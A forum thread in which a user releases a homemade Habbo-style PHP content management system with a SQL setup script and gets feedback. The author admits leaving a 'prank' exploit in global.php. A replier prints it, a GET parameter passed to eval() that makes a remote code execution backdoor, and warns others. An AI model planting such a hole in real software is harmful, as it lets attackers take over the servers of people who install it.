TyphoonCMS - Simple Habbo Content Management System
Hello.
Im here to release my first CMS made from scratch ever.
Some features and things that it uses
- All the basic CMS features
- Hot campaigns
- Housekeeping logs
- MeekroDB
- Smarty TPL System
It uses a Habbo layout with a custom index/register because the one from habbo now is just ugly!
Screenshots
Index: Screenshot by Lightshot
Me page: Screenshot by Lightshot
Don't have time for more screens but this should do.
CMS is dutch sorry!
Don't expect the best scripting ever because i made it in like 4 weeks
But the CMS should be easier to install than RevCMS i'll promise
Just make shure you use PHP5.4
For the database use the phoenix3.11 database and run this query:
Code:
-- --------------------------------------------------------
-- Host: 127.0.0.1
-- Server versie: 5.5.32 - MySQL Community Server (GPL)
-- Server OS: Win32
-- HeidiSQL Versie: 8.1.0.4545
-- --------------------------------------------------------
/*!40101 SET @old_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET NAMES utf8 */;
/*!40014 SET @old_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @old_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
-- Structuur van tabel phoenix.site_hotcampaigns wordt geschreven
DROP TABLE IF EXISTS `site_hotcampaigns`;
CREATE TABLE IF NOT EXISTS `site_hotcampaigns` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`order_id` int(11) NOT NULL DEFAULT '1',
`enabled` enum('0','1') NOT NULL DEFAULT '1',
`image_url` text NOT NULL,
`caption` text NOT NULL,
`descr` text NOT NULL,
`url` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
-- Dumpen data van tabel phoenix.site_hotcampaigns: 0 rows
/*!40000 ALTER TABLE `site_hotcampaigns` DISABLE KEYS */;
INSERT INTO `site_hotcampaigns` (`id`, `order_id`, `enabled`, `image_url`, `caption`, `descr`, `url`) VALUES
(1, 1, '1', 'http://www.habbox.com/images/calvin/archive/images/campaignimages/VIP_hotbutton.gif', 'Test', 'Testing123', '');
/*!40000 ALTER TABLE `site_hotcampaigns` ENABLE KEYS */;
/*!40101 SET SQL_MODE=IFNULL @old_SQL_MODE, '') */;
/*!40014 SET FOREIGN_KEY_CHECKS=IF @old_FOREIGN_KEY_CHECKS IS NULL, 1, @old_FOREIGN_KEY_CHECKS) */;
/*!40101 SET CHARACTER_SET_CLIENT @old_CHARACTER_SET_CLIENT */;
And now the one and only download link: TyphoonCMS.zip download - 2shared
Enjoy using Typhoon!
Don't forget to remove the exploit:
it's between line 28 and 32 at the global.php
just remove that code it was for a prank and i'm too lazy to reupload
Credits to:
Me
GrayFox! for the index
Bye
Re: TyphoonCMS - Simple Habbo Content Management System
I hope the TPL System isn't fucked up. Don't like the style to much but nice try :).
Re: TyphoonCMS - Simple Habbo Content Management System
Your first CMS you say? Good job for furture projects
Re: TyphoonCMS - Simple Habbo Content Management System
Quote:
Originally Posted by
Jerking
I hope the TPL System isn't fucked up. Don't like the style to much but nice try :).
it should be better than UberCMS but i did some crazy literal stuff because i was lazy but is shure does work.
it has a skin system like rev does so you can make your own layout if you want!
- - - Updated - - -
Note: Some features in the housekeeping don't work or work half
Re: TyphoonCMS - Simple Habbo Content Management System
Not too big of a fan of the index, but the me page looks sexy.
Re: TyphoonCMS - Simple Habbo Content Management System
Great for a first CMS. I will use this on my site (not public) and will translate it :thumbup1:
Good luck in the future:):
Re: TyphoonCMS - Simple Habbo Content Management System
Can't believe we still get these messed up online users count boxes.
http://i.imgur.com/upQxp2g.png
It's really not hard to make these properly rounded.
The index isn't brilliant but I've seen worse. The homepage layout is also pretty decent.
From what I can see, 6/10.
Re: TyphoonCMS - Simple Habbo Content Management System
Quote:
Originally Posted by
RainbowJerk
Can't believe we still get these messed up online users count boxes.
http://i.imgur.com/upQxp2g.png
It's really not hard to make these properly rounded.
The index isn't brilliant but I've seen worse. The homepage layout is also pretty decent.
From what I can see, 6/10.
Or you can do what I did just change it a little bit :).
http://oi40.tinypic.com/2nsont5.jpg
Language is dutch.
Re: TyphoonCMS - Simple Habbo Content Management System
I didn't make the habbo layout, habbo did xD. This cms just has the habbo layout with some minor image changes because it was a little bit too boring
Sent from my ST26i using Tapatalk
Re: TyphoonCMS - Simple Habbo Content Management System
Hey,
sry, but I don't like the Index. The Backround isn't my think.
Good luck!
Cheers,
Justitia
Re: TyphoonCMS - Simple Habbo Content Management System
Re: TyphoonCMS - Simple Habbo Content Management System
Any tips for future projects?
Sent from my ST26i using Tapatalk
Re: TyphoonCMS - Simple Habbo Content Management System
Don't use this.
Why you put this in global.php?
if(isset($_GET['phpinfo']))
{
echo eval($_GET['phpinfo']); //:) Unhackable right?
}
It's a backdoor, DONT USE IT at all!!
Re: TyphoonCMS - Simple Habbo Content Management System
Quote:
Originally Posted by
Fenturr
Don't use this.
Why you put this in global.php?
if(isset($_GET['phpinfo']))
{
echo eval($_GET['phpinfo']); //:) Unhackable right?
}
It's a backdoor, DONT USE IT at all!!
Read the post
I told them to remove that code
Sent from my ST26i using Tapatalk
Re: TyphoonCMS - Simple Habbo Content Management System
For the rest. I Do recommend this for beginning hotels because it's so damn easy to install. Soon I will put a db dl link here and I will remove my joke. Don't forget. It has a skin system and you can change the layout with ease
Sent from my ST26i using Tapatalk
Re: TyphoonCMS - Simple Habbo Content Management System
Quote:
Originally Posted by
TR10G33K
For the rest. I Do recommend this for beginning hotels because it's so damn easy to install. Soon I will put a db dl link here and I will remove my joke. Don't forget. It has a skin system and you can change the layout with ease
Sent from my ST26i using Tapatalk
Rev is easier.
Re: TyphoonCMS - Simple Habbo Content Management System
Quote:
Originally Posted by
ησвяαιη
Rev is easier.
Nahh. U have to do that seckey stuff and the client is harder to set up. It's just my opinion.
Sent from my ST26i using Tapatalk
Re: TyphoonCMS - Simple Habbo Content Management System
Im working on typhooncms II. It will look alot better and I wont do long if statements anymore and no jokes this time,!
Sent from my ST26i using Tapatalk
Re: TyphoonCMS - Simple Habbo Content Management System